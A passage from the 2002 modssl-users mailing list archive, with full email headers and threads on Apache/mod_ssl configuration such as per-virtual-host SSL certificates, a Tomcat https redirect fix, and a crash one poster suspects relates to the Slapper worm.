> > > > accuarately, it complains that I didn't type in https:).  If I
remove
> > that
> > > > directive, then port 443 stops listening.  Page cannot be found.  Is
> > there
> > > > some other directive I need to use?  Thanks!!
> > > >
> > > > Justin
> > > >
> > > >
______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > > > User Support Mailing List
modssl-users@modssl.org
> > > > Automated List Manager
majordomo@modssl.org
> > > >
> > >
> > > --
> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >         admin & senior security consultant:  sysinfo.com
> > >                         http://sysinfo.com
> > >
> > > "Cutting the space budget really restores my faith in humanity.  It
> > > eliminates dreams, goals, and ideals and lets us get straight to the
> > > business of hate, debauchery, and self-annihilation."
> > >                 -- Johnny Hart
> > >
> > > testing, only testing, and damn good at it too!
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
>
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
>
> testing, only testing, and damn good at it too!
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 22:03:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA24470; Tue, 3 Dec 2002 22:02:54 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from denali.nightsource.com id WAA24431; Tue, 3 Dec 2002 22:01:05 +0100 (MET)
Received: from whitney.hackhawk.net (denali.nightsource.com [66.127.0.212] (may be forged))
	by denali.nightsource.com (8.11.0/8.11.0) with ESMTP id gB3KJ9I19855
	for ; Tue, 3 Dec 2002 12:19:10 -0800
Message-Id: <5.1.0.14.0.20021203125701.036a0cc0@localhost>
X-Sender:  (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 03 Dec 2002 13:04:07 -0800
To: 
From: Hack Hawk 
Subject: RE: how to add multiple SSL cert for each virtual host?
In-Reply-To: <49A0B02B67B70045B358D868C7B5D0C76C130C@imail.torinfinet.in
 finetcomm.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hack Hawk 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 12:49 PM 12/03/2002, Shawn Syms wrote:
>Hawk: Here is more info on why did doesn't work:
>http://www.ensim.com/support/sxc/faqs/4.10.html

Aha.  That makes sense to me.  I noticed this discussion because I was 
considering doing this sort of thing in the next month or two. Damn!  Now I 
have to provide IP addresses for virtual sites that require this support.  :(

Thanks for the heads up though.

- hawk

>---
>Shawn Syms | Systems Administrator
>Infinet Communications | shawn.syms@infinetcommunications.com
>---
>
>
>
>-----Original Message-----
>From: Hack Hawk [mailto:hh@hackhawk.net]
>Sent: Tuesday, December 03, 2002 3:35 PM
>To: modssl-users@modssl.org
>Subject: RE: how to add multiple SSL cert for each virtual host?
>
>
>What?!?!?!  Are you absolutely sure about this?  SSL certs are based on the
>Domain Name,,, NOT the IP address.  It stands to reason that it would be
>possible for virtual hosts/domains to have their own certs.  Perhaps modssl
>doesn't support it, but I think that in theory it's possible.
>
>- hawk
>
>At 10:24 AM 12/03/2002, you wrote:
> >Multiple SSL certs for name-based virtual hosts aren't possible based upon
> >the way SSL is designed. Each site requiring a separate cert must have it's
> >own IP address.
> >
> >---
> >Shawn Syms | Systems Administrator
> >Infinet Communications | shawn.syms@infinetcommunications.com
> >---
> >
> >
> >
> >-----Original Message-----
> >From: Thomas Sandor [mailto:tsandor@rndsoft.com]
> >Sent: Tuesday, December 03, 2002 1:20 PM
> >To: modssl-users@modssl.org
> >Subject: how to add multiple SSL cert for each virtual host?
> >
> >
> >hi everyone,
> >
> >I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with ssl
> >(openssl 0.9.6g).
> >Till now I had only one domain for which apache should use SSL cert files
> >(crt, key), but for our next project I have to add another SSL cert file a
> >specific domain.
> >
> >I have NameVirtualHost 12.34.56.78 and have a list of  for
> >each of our domain, using ServerNamed base aliases, but for the ssl conf it
> >ain't works. In my ssl.conf in short looks like this:
> >
> >NameVirtualHost 12.34.56.78:443
> >
> >
> >     ServerName domain1.com
> >     CustomLog "..."
> >     ErrorLog "..."
> >     SSLEngine on
> >     SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
> >     SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"
> >
> >
> >
> >     ServerName domain2.com
> >     CustomLog "..."
> >     ErrorLog "..."
> >     SSLEngine on
> >     SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
> >     SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"
> >
> >
> >The problem is that apache does not serve domain2 cert files for domain2,
>it
> >uses the first declaration for every https://domainX.com invoke. Does
>anyone
> >know how to tell apache to uses specific SSL cert I'd like to define for
> >each of my virtualhosts?
> >
> >Thanks in advance for any help.
> >
> >Regards,
> >Thomas

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 22:14:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25149; Tue, 3 Dec 2002 22:13:58 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id WAA25103; Tue, 3 Dec 2002 22:12:49 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO00003F;
    3 Dec 02 22:12:46 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 3 Dec 02 22:12:33 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG00003E;
   3 Dec 02 22:12:22 +0100
Message-ID: <3DED1E48.5050206@stupar.homelinux.net>
Date: Tue, 03 Dec 2002 22:12:40 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Please help !!!!
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi !

I have configured Apache 2.0.43 with mod_ssl and I have created CA and
client certificates but now I cannot acces my ssl server "https://myserver".
What have I made wrong?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 22:14:54 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25085; Tue, 3 Dec 2002 22:12:36 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id WAA25046; Tue, 3 Dec 2002 22:11:21 +0100 (MET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id gB3MAY2l026768
	for ; Tue, 3 Dec 2002 17:10:39 -0500
Date: Tue, 3 Dec 2002 17:10:34 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: how to add multiple SSL cert for each virtual host?
In-Reply-To: <1DBF876C-0701-11D7-9792-000393464F32@w3works.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 3 Dec 2002, Dave Paris wrote:

> Not only is it not possible

With the current state of the SSL protocol such as it is, this is
correct-- it's not possible.

> it'd be a HUGE security flaw if it WERE possible.

Well, not necessarily... all that you would need is for the client to tell
the server which host it *thought* it was contacting, and then the server
would know which vhost to serve the request with and therefore which
certificate to present.  That would require the SSL protocol to have the
equivalent of HTTP's Host: header.  From there, as long as the certificate
can be verified as authentic, there's no more risk than there would be if
there was a one-to-one mapping between IP and hostname as the current SSL
protocol requires.

But please, people, this is SUCH a frequently asked question.  Definitely
one of the top three.  I wonder if we can't find a better way to document
this?  Anyone have any ideas?  I'd say un-hiding it from the FAQ page
would be a good start... it's a prominent question, give the answer a more
prominent location.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 22:31:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26311; Tue, 3 Dec 2002 22:30:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA26246; Tue, 3 Dec 2002 22:29:54 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA17543;
	Tue, 3 Dec 2002 16:30:24 -0500
Date: Tue, 3 Dec 2002 16:30:23 -0500 (EST)
From: "R. DuFresne" 
To: Cliff Woolley 
cc: modssl-users@modssl.org
Subject: Re: how to add multiple SSL cert for each virtual host?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Perhaps including it in the defauly httpd.conf file underr the
 directives as commentary might help?

	#  General setup for the virtual host
	# ...name based VHing does not work, you need to...to get this to
	#  ...work...if you ask this in the modssl-users list, you might
	#well be berated for failing to read documentation...

Perhaps putting the information in the README as well as in the INSTALL
docs, tthus putting it in as many places as possible might help?

Thanks,

Ron DuFresne

P.S.  this is of course not limiting adding it to the list footer :

> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>  ...name based VHing does not work, you need to...to get this to
>  ...work...if you ask this in the modssl-users list, you might
> #well be berated for failing to read documentation...


On Tue, 3 Dec 2002, Cliff Woolley wrote:

	[SNIP]

> 
> But please, people, this is SUCH a frequently asked question.  Definitely
> one of the top three.  I wonder if we can't find a better way to document
> this?  Anyone have any ideas?  I'd say un-hiding it from the FAQ page
> would be a good start... it's a prominent question, give the answer a more
> prominent location.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec  3 23:06:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA27642; Tue, 3 Dec 2002 23:04:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from klawon.org id XAA27630; Tue, 3 Dec 2002 23:04:00 +0100 (MET)
Received: from ktklaptop ([192.168.1.140])
	by klawon.org (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id gB3MFun01745
	for ; Tue, 3 Dec 2002 17:15:56 -0500
Message-ID: <05b801c29b18$2798a230$8c01a8c0@ktklaptop>
From: "Kevin" 
To: 
Subject: Getting error in error log that was similar to slapper worm
Date: Tue, 3 Dec 2002 17:04:52 -0500
Organization: Klawon Family
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_05A7_01C29AEE.188EF070"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_05A7_01C29AEE.188EF070
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello --

I am running the Covalent release of apache 1.3.27, which has 0.9.6g of =
OpenSSL.

I am getting the following error in my error_log along with the apache =
service crashing, (The exact same error happen right as the slapper worm =
became prevalent):

[Mon Dec  2 16:18:17 2002] [error] [client 193.2.210.39] client sent =
HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
accept_mutex_on: No space left on device
[Mon Dec  2 16:18:25 2002] [alert] Child 8390 returned a Fatal error...=20
Apache is exiting!
[Mon Dec  2 16:41:47 2002] [notice] jrApache[init] JRun 3.0 3.00.3664 =
Apache module - May 19 2000 13:00:51
[Mon Dec  2 16:41:50 2002] [warn] pid file =
/usr/local/apache1.3/logs/httpsd.pid overwritten -- Unclean shutdown of =
previous Apache run?
[Mon Dec  2 16:41:50 2002] [notice] jrApache[init] JRun 3.0 3.00.3664 =
Apache module - May 19 2000 13:00:51
[Mon Dec  2 16:41:51 2002] [notice] Apache/1.3.27 (Unix) =
secured_by_Covalent/1.6.0 configured -- resuming normal operations
[Mon Dec  2 16:41:51 2002] [notice] Accept mutex: sysvsem (Default: =
sysvsem)

I thought it was the slapper worm causing the server to crash. I have =
plenty of room on all disk partitions (including the root) and things =
look normal when running an ipcs.  Has anyone seen this before or know =
what might be going wrong?  This is the first time it has happen after =
upgrading to 1.3.27 with 0.9.6g.

Thanks,
KevinK

------=_NextPart_000_05A7_01C29AEE.188EF070
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello --


 


I am running the Covalent release of =
apache 1.3.27,=20
which has 0.9.6g of OpenSSL.


 


I am getting the following error in my =
error_log=20
along with the apache service crashing, (The exact same error=20
happen right as the slapper worm became prevalent):


 


[Mon Dec  2 16:18:17 2002] [error] =
[client=20
193.2.210.39] client sent HTTP/1.1 request without hostname (see RFC2616 =
section=20
14.23): /
accept_mutex_on: No space left on device


[Mon Dec  2 16:18:25 2002] [alert] =
Child 8390=20
returned a Fatal error... 
Apache is exiting!


[Mon Dec  2 16:41:47 2002] =
[notice]=20
jrApache[init] JRun 3.0 3.00.3664 Apache module - May 19 2000 =
13:00:51
[Mon=20
Dec  2 16:41:50 2002] [warn] pid file =
/usr/local/apache1.3/logs/httpsd.pid=20
overwritten -- Unclean shutdown of previous Apache run?
[Mon =
Dec  2=20
16:41:50 2002] [notice] jrApache[init] JRun 3.0 3.00.3664 Apache module =
- May 19=20
2000 13:00:51
[Mon Dec  2 16:41:51 2002] [notice] Apache/1.3.27 =
(Unix)=20
secured_by_Covalent/1.6.0 configured -- resuming normal =
operations
[Mon=20
Dec  2 16:41:51 2002] [notice] Accept mutex: sysvsem (Default:=20
sysvsem)


I thought it was the slapper worm =
causing the=20
server to crash. I have plenty of room on all disk =
partitions=20
(including the root) and things look normal when running an=20
ipcs.  Has anyone seen this before or know what might be going =
wrong? =20
This is the first time it has happen after upgrading to 1.3.27 with=20
0.9.6g.


 


Thanks,


KevinK


------=_NextPart_000_05A7_01C29AEE.188EF070--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 08:32:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA20739; Wed, 4 Dec 2002 08:31:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id IAA20735; Wed, 4 Dec 2002 08:31:03 +0100 (MET)
From: Krist.vanBesien@BIT.admin.ch
Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id gB47V3d01183
	for ; Wed, 4 Dec 2002 08:31:03 +0100 (MET)
Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82])
	by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id gB47HQG04517
	for ; Wed, 4 Dec 2002 08:17:27 +0100 (MET)
Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id ; Wed, 4 Dec 2002 08:17:26 +0100
Message-ID: <08CC1787EEE6D311804A0008C72813EA05EAE229@bfi0001.bfi.admin.ch>
To: modssl-users@modssl.org
Subject: RE: how to add multiple SSL cert for each virtual host?
Date: Wed, 4 Dec 2002 08:17:23 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Krist.vanBesien@BIT.admin.ch
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



> Aha.  That makes sense to me.  I noticed this discussion 
> because I was 
> considering doing this sort of thing in the next month or 
> two. Damn!  Now I 
> have to provide IP addresses for virtual sites that require 
> this support.  :(

Might not something like this work? It gives you name based virtual hosts
for the http part...


NameVirtualHost 12.34.56.78:80


     ServerName domain1.com
     Redirect / https://domain1.com:1443



     ServerName domain2.com
     Redirect / https://domain2.com:1444



     ServerName domain1.com
     CustomLog "..."
     ErrorLog "..."
     SSLEngine on
     SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
     SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"



     ServerName domain2.com
     CustomLog "..."
     ErrorLog "..."
     SSLEngine on
     SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
     SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"


I've just written this from the top of my head, so I don;t know if I didn't
make any syntax errors. But I'll have to try this out someday here, as I'm
going to run into the same problem as you are now.

Greetings,

Krist

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 09:14:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA22730; Wed, 4 Dec 2002 09:13:06 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA22725; Wed, 4 Dec 2002 09:13:03 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1A09F4CE73A; Wed,  4 Dec 2002 09:13:03 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C81F4286E6; Wed,  4 Dec 2002 07:33:00 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from main.gmane.org id WAA26138; Tue, 3 Dec 2002 22:25:22 +0100 (MET)
Received: from list by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18JKVK-0000hT-00
	for ; Tue, 03 Dec 2002 22:22:54 +0100
To: modssl-users@modssl.org
X-Injected-Via-Gmane: http://gmane.org/
Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18JKVJ-0000hI-00
	for ; Tue, 03 Dec 2002 22:22:53 +0100
Path: not-for-mail
From: Paul Christmann 
Subject: Re: mod_ssl and mod_jk (Win32)
Date: Tue, 03 Dec 2002 15:25:21 -0600
Lines: 49
Message-ID: <3DED2141.8020007@priorartisans.com>
References: <3DE7A14F.8030100@priorartisans.com>
NNTP-Posting-Host: route-216-227-98-91.telocity.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: main.gmane.org 1038950573 1842 216.227.98.91 (3 Dec 2002 21:22:53 GMT)
X-Complaints-To: usenet@main.gmane.org
NNTP-Posting-Date: Tue, 3 Dec 2002 21:22:53 +0000 (UTC)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Christmann 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Answering my own question in case anyone else ever encounters this:

Modify Tomcat's server.xml specifying scheme="https" (rather than 
scheme="http") for the Connector used to wire Apache and Tomcat.

Paul Christmann wrote:
> Environment:
> 
> Running Apache 2.0.43/OpenSSL 9.6.g as downloaded from 
> hunter.campbus.com and mod_jk 1.2.1 for build 2.0.43 from jakarta.
> 
> Problem:
> 
> When I access the URL https://localhost/app, I *hope* to get the 
> contents of index.html (i.e., https://localhost/app/index.html). 
> Instead, my browser (Mozilla 1.0) reports a "Bad Request" error, 
> indicating that there was a protocol error in accessing the URL 
> "http://localhost:443/app/index.html".
> 
> Of course there will be a protocol error -- using http to talk to the 
> https port!
> 
> Any ideas where that error might come from?  I assume its something 
> happening with a redirect in Tomcat.
> 
> FWIW:
> 
> Each of the following URLs work fine (right now, I have Apache 
> configured to take all connections either from http or https and forward 
> to Tomcat):
> 
> + http://localhost/app
> + http://localhost/app/index.html
> + https://localhost/app/index.html
> 
> Its only the https://localhost/app URL that's failing.
> 
> Thanks for any assistance,
> 
> Paul Christmann
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 09:14:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA22733; Wed, 4 Dec 2002 09:13:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA22724; Wed, 4 Dec 2002 09:13:03 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0897F4CE696; Wed,  4 Dec 2002 09:13:03 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C8BEF286C4; Wed,  4 Dec 2002 07:32:51 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailexchange.infinetcomm.com id VAA23767; Tue, 3 Dec 2002 21:49:32 +0100 (MET)
Received: from imail.torinfinet.infinetcomm.com (imail [10.98.1.31])
	by mailexchange.infinetcomm.com (8.11.4/8.11.4) with ESMTP id gB3Jct813903;
	Tue, 3 Dec 2002 14:38:55 -0500
Received: by imail.torinfinet.infinetcomm.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 3 Dec 2002 15:49:23 -0500
Message-ID: <49A0B02B67B70045B358D868C7B5D0C76C130C@imail.torinfinet.infinetcomm.com>
From: Shawn Syms 
To: "'modssl-users@modssl.org'" 
Cc: "'hh@hackhawk.net'" 
Subject: RE: how to add multiple SSL cert for each virtual host?
Date: Tue, 3 Dec 2002 15:49:21 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shawn Syms 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hawk: Here is more info on why did doesn't work:
http://www.ensim.com/support/sxc/faqs/4.10.html

---
Shawn Syms | Systems Administrator
Infinet Communications | shawn.syms@infinetcommunications.com
---



-----Original Message-----
From: Hack Hawk [mailto:hh@hackhawk.net]
Sent: Tuesday, December 03, 2002 3:35 PM
To: modssl-users@modssl.org
Subject: RE: how to add multiple SSL cert for each virtual host?


What?!?!?!  Are you absolutely sure about this?  SSL certs are based on the 
Domain Name,,, NOT the IP address.  It stands to reason that it would be 
possible for virtual hosts/domains to have their own certs.  Perhaps modssl 
doesn't support it, but I think that in theory it's possible.

- hawk

At 10:24 AM 12/03/2002, you wrote:
>Multiple SSL certs for name-based virtual hosts aren't possible based upon
>the way SSL is designed. Each site requiring a separate cert must have it's
>own IP address.
>
>---
>Shawn Syms | Systems Administrator
>Infinet Communications | shawn.syms@infinetcommunications.com
>---
>
>
>
>-----Original Message-----
>From: Thomas Sandor [mailto:tsandor@rndsoft.com]
>Sent: Tuesday, December 03, 2002 1:20 PM
>To: modssl-users@modssl.org
>Subject: how to add multiple SSL cert for each virtual host?
>
>
>hi everyone,
>
>I have an apache 2.0.40 installed on a RedHat 7.2 box, complied with ssl
>(openssl 0.9.6g).
>Till now I had only one domain for which apache should use SSL cert files
>(crt, key), but for our next project I have to add another SSL cert file a
>specific domain.
>
>I have NameVirtualHost 12.34.56.78 and have a list of  for
>each of our domain, using ServerNamed base aliases, but for the ssl conf it
>ain't works. In my ssl.conf in short looks like this:
>
>NameVirtualHost 12.34.56.78:443
>
>
>     ServerName domain1.com
>     CustomLog "..."
>     ErrorLog "..."
>     SSLEngine on
>     SSLCertificateFile "/somewhere/ssl.crt/domain1.crt"
>     SSLCertificateKeyFile "somewhere/ssl.key/domain1.key"
>
>
>
>     ServerName domain2.com
>     CustomLog "..."
>     ErrorLog "..."
>     SSLEngine on
>     SSLCertificateFile "/somewhere/ssl.crt/domain2.crt"
>     SSLCertificateKeyFile "somewhere/ssl.key/domain2.key"
>
>
>The problem is that apache does not serve domain2 cert files for domain2,
it
>uses the first declaration for every https://domainX.com invoke. Does
anyone
>know how to tell apache to uses specific SSL cert I'd like to define for
>each of my virtualhosts?
>
>Thanks in advance for any help.
>
>Regards,
>Thomas
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 13:19:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA07174; Wed, 4 Dec 2002 13:18:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id NAA07149; Wed, 4 Dec 2002 13:17:13 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gB4CHC4O025288
	for ; Wed, 4 Dec 2002 13:17:12 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gB4CHCDm012965
	for ; Wed, 4 Dec 2002 13:17:12 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: how to add multiple SSL cert for each virtual host?
Date: Wed, 4 Dec 2002 13:17:12 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: how to add multiple SSL cert for each virtual host?
Thread-Index: AcKbEYmVyKy5Tsc8TJyOtUo4COlBEAAYgWcw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

